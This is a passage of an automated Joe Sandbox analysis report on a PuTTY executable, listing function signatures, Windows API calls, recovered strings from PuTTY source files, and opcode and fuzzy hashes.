                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control$XON/XOFF
                                                          • API String ID: 274883806-924046750
                                                          • Opcode ID: 59c3a669f34e8b0e9ba172c7ce8ca03ecfb584f098ce5d699e6a255ed61582a1
                                                          • Instruction ID: 6344dd5876ddbf497b2f1bbff942cd7876b72373de7bcbdd8e1e347f1545c708
                                                          • Opcode Fuzzy Hash: 59c3a669f34e8b0e9ba172c7ce8ca03ecfb584f098ce5d699e6a255ed61582a1
                                                          • Instruction Fuzzy Hash: A0F02613B0D61361FA21EB119400579E310EF85B80FC04231DA4D06988DE7DE681E724
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleThread_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$clipboard == CLIP_SYSTEM
                                                          • API String ID: 968033324-856420494
                                                          • Opcode ID: 9c5316d3c78a9fe1cfaabbfecd416a52fe0cbf0ee7a327785f7175f7fefb59cb
                                                          • Instruction ID: 807084248d996aef84355ec62e4ad8bf105cd66f59f8546556084032a8894860
                                                          • Opcode Fuzzy Hash: 9c5316d3c78a9fe1cfaabbfecd416a52fe0cbf0ee7a327785f7175f7fefb59cb
                                                          • Instruction Fuzzy Hash: 4CF0A762A1E607A1FB10AB10F855566F390EF85744FC44435D44F07764DF3EE505D714
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ObjectPaletteSelectStock_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$wgs->term_hwnd
                                                          • API String ID: 2940787024-1764328106
                                                          • Opcode ID: 736e2d95929279315c4da6cea961b3daf8523e88ae2ed17628a26ed56410d4ab
                                                          • Instruction ID: fc5d3fa7de72db96b34e02edbcf1a20def2628fd56af65b8a4ed62d03d7724b2
                                                          • Opcode Fuzzy Hash: 736e2d95929279315c4da6cea961b3daf8523e88ae2ed17628a26ed56410d4ab
                                                          • Instruction Fuzzy Hash: 56F0EC46A05422A1EA10A706A841364E320EF88BE0F908030CD0C03B84DE3EA482E328
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF738B0BBA0), ref: 00007FF738B0B8EB
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF738B0BBA0), ref: 00007FF738B0B975
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: 0671426c9464719ec4550cd45017b6a4e54302218ab75db4f3a19593d3983b17
                                                          • Instruction ID: 844ad57fd6851bc07d3d7f44a8ed17e8d8fb6a6b8905221afd514803c8f52dd7
                                                          • Opcode Fuzzy Hash: 0671426c9464719ec4550cd45017b6a4e54302218ab75db4f3a19593d3983b17
                                                          • Instruction Fuzzy Hash: E49112A3E18653A9FB50AB659440ABCF7A0FB04B8CF844135DE1E53695CF3AD441E32B
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo$_get_daylight
                                                          • String ID:
                                                          • API String ID: 72036449-0
                                                          • Opcode ID: c37372ec61b4f9942604653e21d47dbb8aa72487a77f6d84006ada27973a88c2
                                                          • Instruction ID: bd26709bcecef77b73d12ebf270c8a09a6eebd58a9362622a2065b13683e5984
                                                          • Opcode Fuzzy Hash: c37372ec61b4f9942604653e21d47dbb8aa72487a77f6d84006ada27973a88c2
                                                          • Instruction Fuzzy Hash: BE510233E0C2036AF7297A28900037DE583DB41754F998535CA5D6E2C6CF3EEA41A66F
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID:
                                                          • API String ID: 3015471070-0
                                                          • Opcode ID: 87083c0412621a819ac6875e0e999821b924a340d0f4222b18e2f3ee1e75df2f
                                                          • Instruction ID: 61aa64a7c5fe037a554e2d3e921f20bf4f621dfec4b67353794d12258aca15ce
                                                          • Opcode Fuzzy Hash: 87083c0412621a819ac6875e0e999821b924a340d0f4222b18e2f3ee1e75df2f
                                                          • Instruction Fuzzy Hash: E341F273A0A601A6E660AB11A944F7AF750FB45BA0F914330CE9D03794EF3EA585F718
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Color
                                                          • String ID:
                                                          • API String ID: 2811717613-0
                                                          • Opcode ID: 5387a8898f084a8cccd4cb3bdc30c73654086cb8e3c8a36586e71063f45b0eb8
                                                          • Instruction ID: cdeeaa73a4a016e9e83085afdd3d586c7b5ecafb571de5236786da61a4ced9c8
                                                          • Opcode Fuzzy Hash: 5387a8898f084a8cccd4cb3bdc30c73654086cb8e3c8a36586e71063f45b0eb8
                                                          • Instruction Fuzzy Hash: 1E31900310D7C156E731E3A5641119BEA21EBD9784F88026AEBCD07B8ADD7CC606DB69
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Context$CompositionProcReleaseStringWindow
                                                          • String ID:
                                                          • API String ID: 1012507852-0
                                                          • Opcode ID: a2443fe7e29c611472d95208efbc1e4f36d6122258a1dc2df3ac41b94aeb5b60
                                                          • Instruction ID: 98959fb3b76defa251ca7f33aa0c34b5b842c96c31dbe6117fb137fee91b197b
                                                          • Opcode Fuzzy Hash: a2443fe7e29c611472d95208efbc1e4f36d6122258a1dc2df3ac41b94aeb5b60
                                                          • Instruction Fuzzy Hash: 2421D813F0911666FB61BA16D802BB5E1809B85B94FC44031DD0D9B7C2DE7FA842676C
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Rect$InvalidateWindow$ClientDestroyProc
                                                          • String ID:
                                                          • API String ID: 3789280143-0
                                                          • Opcode ID: a8db0e0c1f875e56507162407ea4717d0a346b5994ecbdc9aa002ade8e35d871
                                                          • Instruction ID: 5bb590f31c1c8a7eeec85a97725ac9c2ab6efa93cd72ad4e41108e0c5573f8fa
                                                          • Opcode Fuzzy Hash: a8db0e0c1f875e56507162407ea4717d0a346b5994ecbdc9aa002ade8e35d871
                                                          • Instruction Fuzzy Hash: 38310633B0918697E794FB2AD404BAAF798EFC8B44F454135DE0D83785DE3AD8418710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CountTickTimer$Kill
                                                          • String ID:
                                                          • API String ID: 2638796510-0
                                                          • Opcode ID: 51aa5687044183c2c8f0d899ffda2a8774aa04fbf9c4dc05245969a7f7d07de3
                                                          • Instruction ID: 902e813fd5fcf349e2b6e03396b67331073717fab4d6f40ce7d885c6f04f2a74
                                                          • Opcode Fuzzy Hash: 51aa5687044183c2c8f0d899ffda2a8774aa04fbf9c4dc05245969a7f7d07de3
                                                          • Instruction Fuzzy Hash: 4F2135A3B1D10352FB60BB65FD10579E360AB89BA0F840332ED0E47B65CD3DE846D618
                                                          APIs
                                                          • DeleteObject.GDI32 ref: 00007FF738A36F9B
                                                            • Part of subcall function 00007FF738A6A7F0: closesocket.WS2_32 ref: 00007FF738A6A824
                                                            • Part of subcall function 00007FF738A6A7F0: FreeLibrary.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570), ref: 00007FF738A6A871
                                                            • Part of subcall function 00007FF738A3D6C0: DeleteFileA.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570), ref: 00007FF738A3D6F3
                                                          • CoUninitialize.OLE32(00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A36F21
                                                            • Part of subcall function 00007FF738AF6AC4: GetModuleHandleW.KERNEL32 ref: 00007FF738AF6C3F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Delete$FileFreeHandleLibraryModuleObjectUninitializeclosesocket
                                                          • String ID:
                                                          • API String ID: 88613629-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Context$CaretCompositionReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3049481515-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: Zoomed$LongMessageSendWindow
                                                          • String ID:
                                                          • API String ID: 594883883-0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorFileLastRead
                                                          • String ID: MZx
                                                          • API String ID: 1948546556-2575928145
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3367045223-542146527
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5918E
                                                          • c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list)), xrefs: 00007FF738A59187
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && (c->ctrl->type == CTRL_LISTBOX || (c->ctrl->type == CTRL_EDITBOX && c->ctrl->editbox.has_list))
                                                          • API String ID: 3015471070-3566709245
                                                          APIs
                                                          Strings
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5970E
                                                          • c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel, xrefs: 00007FF738A59707
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && !c->ctrl->listbox.multisel
                                                          • API String ID: 3015471070-1277133168
                                                          APIs
                                                          Strings
                                                          • c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0, xrefs: 00007FF738A59647
                                                          • /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c, xrefs: 00007FF738A5964E
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX && c->ctrl->listbox.multisel && c->ctrl->listbox.height != 0
                                                          • API String ID: 3015471070-265503542
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX
                                                          • API String ID: 3015471070-587638513
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3015471070-542146527
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Similarity
                                                          • API ID: ItemText
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_EDITBOX
                                                          • API String ID: 3367045223-542146527
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: BreakClearCloseCommHandle
                                                          • String ID: Error writing to serial device
                                                          • API String ID: 2685284230-3232346394
                                                          • Opcode ID: 67705d588f0b60758abc2e797882ad0b9194a461a85c459c69172f0221ff9d9b
                                                          • Instruction ID: 8f33540ef313e1e4bf661586d2ec9bec65760105f1cea9c6568c696ef9897918
                                                          • Opcode Fuzzy Hash: 67705d588f0b60758abc2e797882ad0b9194a461a85c459c69172f0221ff9d9b
                                                          • Instruction Fuzzy Hash: 9121A76760660292EA21AB56E08033EE360EB45BB0F444331CBAE07FE5CF3DE4459354
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Menu$AppendDelete
                                                          • String ID: (No sessions)
                                                          • API String ID: 4109642853-1102551510
                                                          • Opcode ID: 35f80733ee2a4ee07da47ec0c04de53f3e6765da5e59e5b27d3bdaea61ebfb4f
                                                          • Instruction ID: 1e4061f9bda17457302c16937d0bcd90184f0ec490aed1e1c92b25e948a62c7f
                                                          • Opcode Fuzzy Hash: 35f80733ee2a4ee07da47ec0c04de53f3e6765da5e59e5b27d3bdaea61ebfb4f
                                                          • Instruction Fuzzy Hash: 3A1102A3B0954291F714AB12E850BE9D311FB8A7D5F810131CF0D87390CE7FE8869324
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ButtonChecked
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_CHECKBOX
                                                          • API String ID: 1719414920-1969232164
                                                          • Opcode ID: 966464a0b58c783dee34b93c5abc8ce7e1a7c55995a3109bf2a6e04f4b8752f9
                                                          • Instruction ID: 8c510cafa9ac70343a97182724b1fc60d1ad5c87400d2319475688c2a4ac41d9
                                                          • Opcode Fuzzy Hash: 966464a0b58c783dee34b93c5abc8ce7e1a7c55995a3109bf2a6e04f4b8752f9
                                                          • Instruction Fuzzy Hash: 28018467B06506A1FB51AB56D841575E3A0BB54BD0FC48131CE4C47755EE3EE881E314
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
